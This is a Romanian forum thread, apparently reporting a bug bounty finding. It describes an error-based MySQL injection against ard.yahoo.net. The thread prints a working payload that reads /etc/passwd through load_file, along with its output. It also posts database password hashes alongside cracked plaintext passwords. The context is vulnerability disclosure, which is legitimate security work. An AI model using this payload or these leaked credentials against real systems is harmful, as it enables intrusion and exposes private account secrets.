Jump to content
dancezar

[SQLI] ard.yahoo.net

Recommended Posts

  • Active Members
Posted (edited)

Target: ard.yahoo.net

Exploit: Mysql injection error based

Metod: POST

P.O.C 1#

200p4ra.jpg

http://s30.postimg.org/o922i33en/SQLi_Version.jpg

P.O.C 2#

ddym45.jpg

http://s29.postimg.org/7qcy35o9x/root.jpg



root*FBC29A1C04A33DD6F834D6C4F7B19600CD9A78CD: zaq1zaq1
zqgame_com*E2EF6EF6136DB3CB73A1B7C5588BD09CF8602894: 1qaz1qaz
Parole pentru mysql dictionary based:))

File_Priv era Y deci se puteau citi fisiere , dar nu si scrie din cauza acelui slash \ chiar daca bagai ' sau ".



' or 1 group by concat(mid(load_file('/etc/passwd'),1,64),floor(rand(0)*2)) having min(0) or 1#

(Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 'group_key')

Ciudat este ca eroarea aparea chiar daca bagai ' sau \u0027 sau \x27 .

Eroarea a fost descoperita de @akkiliON , iar eu am reusit sa o exploatez.Vulnerabilitatea a fost triaged si cel mai probabil daca vom primi bani vom imparti recompensa.

Edited by danyweb09
  • Upvote 1
Posted

Ce tine de yahoo.net nu prea ofera recompensa, tin minte ca au fost unii care au urcat si shell in yahoo.net si nu au primit nimic, eu va tin pumnii sa luati cat mai mult.

  • Active Members
Posted
This report is not eligible for a bounty because it is not within the scope for an award. However, the report is still considered when calculating your overall rank in the Hall of Fame.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...